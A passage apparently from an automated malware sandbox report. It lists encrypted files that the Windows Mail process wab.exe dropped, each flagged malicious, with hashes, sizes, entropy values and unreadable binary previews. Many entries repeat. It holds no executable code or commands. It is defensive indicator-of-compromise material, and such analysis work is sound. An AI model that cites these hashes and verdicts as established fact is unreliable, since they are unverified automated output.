                                                                                SHA-256:9BA007E91AC0E52BC5BFBD125E27E7BE96F6D39D50165449AB15734AE513158F
                                                                                SHA-512:A03643DC255994D8317EE432125992159002A7C35433AD4811EC4EB81C3CD767CF01C7AD4429C7AFB68BA20313220DF6091ED8B0F76DFB7995363CB78121DA1D
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):147491
                                                                                Entropy (8bit):7.998675939065718
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpEljEk5FDQxt5RgLC93keX:ZIc0afzkI9WaXNMyQH3bNxAj/5FDQ/IM
                                                                                MD5:C58B2486DB6311F906DCE8778423C610
                                                                                SHA1:6F095BE2A8C5CE293DD6E9CC3A14BFD282E93D6D
                                                                                SHA-256:9BA007E91AC0E52BC5BFBD125E27E7BE96F6D39D50165449AB15734AE513158F
                                                                                SHA-512:A03643DC255994D8317EE432125992159002A7C35433AD4811EC4EB81C3CD767CF01C7AD4429C7AFB68BA20313220DF6091ED8B0F76DFB7995363CB78121DA1D
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):155701
                                                                                Entropy (8bit):7.998605016431916
                                                                                Encrypted:true
                                                                                SSDEEP:3072:IzZs+py2tce+sVzfEc/CypDYlvCpEALvGnGdXJHMw3GcYqLwEEHu1E2qTXtT3cFW:IzZP7EbyNYSzOYXhNv6kE2yTMFW
                                                                                MD5:88A7677C62598257A8A2EA17C702FC46
                                                                                SHA1:D08FF636E3D478C44780F3241EA61B8875D9FA8C
                                                                                SHA-256:4438ADE0205CA4473E917E9211E3DF22DA47C6F6A228C1B6D48EF191D50CC07D
                                                                                SHA-512:7B1C1BDCF72F440163DEE4B3F0585E9CD4CF5CB7DA36710A14BBFF3F6C4917005025C0EE27307A1CEBD42732FCA0F415FA7B8D6BA15DF9A55C02DD1122B96EB3
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):147491
                                                                                Entropy (8bit):7.998675939065718
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpEljEk5FDQxt5RgLC93keX:ZIc0afzkI9WaXNMyQH3bNxAj/5FDQ/IM
                                                                                MD5:C58B2486DB6311F906DCE8778423C610
                                                                                SHA1:6F095BE2A8C5CE293DD6E9CC3A14BFD282E93D6D
                                                                                SHA-256:9BA007E91AC0E52BC5BFBD125E27E7BE96F6D39D50165449AB15734AE513158F
                                                                                SHA-512:A03643DC255994D8317EE432125992159002A7C35433AD4811EC4EB81C3CD767CF01C7AD4429C7AFB68BA20313220DF6091ED8B0F76DFB7995363CB78121DA1D
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):147491
                                                                                Entropy (8bit):7.998675939065718
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpEljEk5FDQxt5RgLC93keX:ZIc0afzkI9WaXNMyQH3bNxAj/5FDQ/IM
                                                                                MD5:C58B2486DB6311F906DCE8778423C610
                                                                                SHA1:6F095BE2A8C5CE293DD6E9CC3A14BFD282E93D6D
                                                                                SHA-256:9BA007E91AC0E52BC5BFBD125E27E7BE96F6D39D50165449AB15734AE513158F
                                                                                SHA-512:A03643DC255994D8317EE432125992159002A7C35433AD4811EC4EB81C3CD767CF01C7AD4429C7AFB68BA20313220DF6091ED8B0F76DFB7995363CB78121DA1D
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):154139
                                                                                Entropy (8bit):7.998722226741127
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpEljEM6ewcoENY2kfLCudhpPY4:ZIc0afzkI9WaXNMyQH3bNxAjCXENuDPF
                                                                                MD5:7A0399504DD5FB196FBF3166003E0507
                                                                                SHA1:B274B9AE437F2933D0C66EB99FBE0E9A95A80097
                                                                                SHA-256:0857139942B188B07247D5B9556BC4EF0FCEBC3A36058BE21728BB52C3F882EE
                                                                                SHA-512:DCC6773337970936534166EF60BEB5FEA78B20FD87B51DB96F46457DC8D75C3C10BECD54DC00F194C7E5623CABCECB5720DB43603C283331E6C309335040E309
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):153351
                                                                                Entropy (8bit):7.998791207922742
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpEljEM6ew/lASLWXDe9z8ZN:ZIc0afzkI9WaXNMyQH3bNxAjC/GSqXDZ
                                                                                MD5:3AD4DCBA3474B560F8CA4C269CB840AF
                                                                                SHA1:7CE19993B92A571A5CD07B57DA4FBB94265E9029
                                                                                SHA-256:6BA76D4BA9EF267689E0730062517A20EA24C670EFBDA279633439B54A4A1803
                                                                                SHA-512:DD0E3845F2B2042B8C0A55EFB469BB3AF68394FEA461F009183E270F65285AB001C45B9915B4436A40D385D5C4DA2357D5598B2C24FAB3B60109D4DB783EF934
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):153546
                                                                                Entropy (8bit):7.99874750746195
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpEljEM6ew/lASLMz9hZ/Tk:ZIc0afzkI9WaXNMyQH3bNxAjC/GSuzZQ
                                                                                MD5:A368FCA41310DE64919D11D6A74A0A08
                                                                                SHA1:B69768C526B8AC74A4AAF86ADD0E9FB5A612DA05
                                                                                SHA-256:495F0E34CE3C5DD769D4F2100851969236797CEA6BAEA957A63214EA95FCC39A
                                                                                SHA-512:D4956546C352AF273A59E0F8834A4E2DCABF00996032F06134D5E581331EB29888CB813A16D370242482056829D50532DC0764A2A497FB17A994B1409AF77030
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):153587
                                                                                Entropy (8bit):7.998728679539068
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpi5UzhVrC7BXE36hXGp:ZIc0afzkI9WaXNMyQH3bNxiaz27GOWp
                                                                                MD5:D6122946BDD2246A419E55CAD40A0876
                                                                                SHA1:739065BFD1FD60A3E94514FB0155E69A90BF82F5
                                                                                SHA-256:55C1E02233CA099B1200FD97EF3FCC3F89BC6820DC0B011DEF65A760688538B7
                                                                                SHA-512:49C2ECE2DDFFF82F4EE2206FC2054DE1E8940EFD0B3D301A81F8C2FB1936A3CB938487CB91832A23CCBB7EF7E2CEF216B766DE35B9EAC4F0894D4C9354B375F1
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):153018
                                                                                Entropy (8bit):7.998682520536714
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpEljEk5FD3r7/lNgi:ZIc0afzkI9WaXNMyQH3bNxAj/5FD3Xn3
                                                                                MD5:BC16FCC0A78888A1DD78F84E609AA902
                                                                                SHA1:D3B005D7DBA67C84B1778EB182B5863F81E51FBE
                                                                                SHA-256:04A5043C130B24E7DD634CDA82DCC468B7280F88BE96050F83265E79A56107A9
                                                                                SHA-512:9FD7147A2EAB95864C6F2C79ADA55C69A1979EA5E45ED7D488D29D34950455E9025BC2EC15CD5DF7E7E1CD4ED545BD4F320C9D508FC5978BF12029307B159524
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):153602
                                                                                Entropy (8bit):7.9988250968868195
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3V8jqtQp92zTFpkmGYi3gV:ZIc0afzkI9WaXNMyQH3eWtQizTF7
                                                                                MD5:A498C4FD8908BFF0D4AB5ACB6763046A
                                                                                SHA1:264C139615D936870A005BD2E935BC534918E1AD
                                                                                SHA-256:4D8D4EE04728DE8408DCAB3D12A6558331FA7A7144C850261760F360A20D262B
                                                                                SHA-512:3BB534B07FD708D87C98F21E2A64B5F1FC867A32C85F8A54BFDE16616C6887B8BD3D14C02D5DBDF25E24B3BAB1B0DBDF8C0A576880BE92239A9A2CCE9D088D1E
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):153602
                                                                                Entropy (8bit):7.9988250968868195
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3V8jqtQp92zTFpkmGYi3gV:ZIc0afzkI9WaXNMyQH3eWtQizTF7
                                                                                MD5:A498C4FD8908BFF0D4AB5ACB6763046A
                                                                                SHA1:264C139615D936870A005BD2E935BC534918E1AD
                                                                                SHA-256:4D8D4EE04728DE8408DCAB3D12A6558331FA7A7144C850261760F360A20D262B
                                                                                SHA-512:3BB534B07FD708D87C98F21E2A64B5F1FC867A32C85F8A54BFDE16616C6887B8BD3D14C02D5DBDF25E24B3BAB1B0DBDF8C0A576880BE92239A9A2CCE9D088D1E
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):153687
                                                                                Entropy (8bit):7.998850120958721
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3V8jqtQp92zTFpkgoCT4:ZIc0afzkI9WaXNMyQH3eWtQizTFwo4
                                                                                MD5:B95BC920F9399C3265063F9C81AC37DB
                                                                                SHA1:6553504908500D2CE9E2C73D2972CAFC4341B3F9
                                                                                SHA-256:A38CB194874EF42A56F3C1A4C133B6B229639C44DCEC5ED69E34362551D7FC71
                                                                                SHA-512:0475C9CB9501C292DFB5D4C296C09CEAE15A031E7E74E4856788F338483EA919EFF44E5A69D27E2F161F3E7D505CCD8E06807293C4E233BEAC045C33ED64C78A
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):153687
                                                                                Entropy (8bit):7.998850120958721
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3V8jqtQp92zTFpkgoCT4:ZIc0afzkI9WaXNMyQH3eWtQizTFwo4
                                                                                MD5:B95BC920F9399C3265063F9C81AC37DB
                                                                                SHA1:6553504908500D2CE9E2C73D2972CAFC4341B3F9
                                                                                SHA-256:A38CB194874EF42A56F3C1A4C133B6B229639C44DCEC5ED69E34362551D7FC71
                                                                                SHA-512:0475C9CB9501C292DFB5D4C296C09CEAE15A031E7E74E4856788F338483EA919EFF44E5A69D27E2F161F3E7D505CCD8E06807293C4E233BEAC045C33ED64C78A
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):153018
                                                                                Entropy (8bit):7.998682520536714
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpEljEk5FD3r7/lNgi:ZIc0afzkI9WaXNMyQH3bNxAj/5FD3Xn3
                                                                                MD5:BC16FCC0A78888A1DD78F84E609AA902
                                                                                SHA1:D3B005D7DBA67C84B1778EB182B5863F81E51FBE
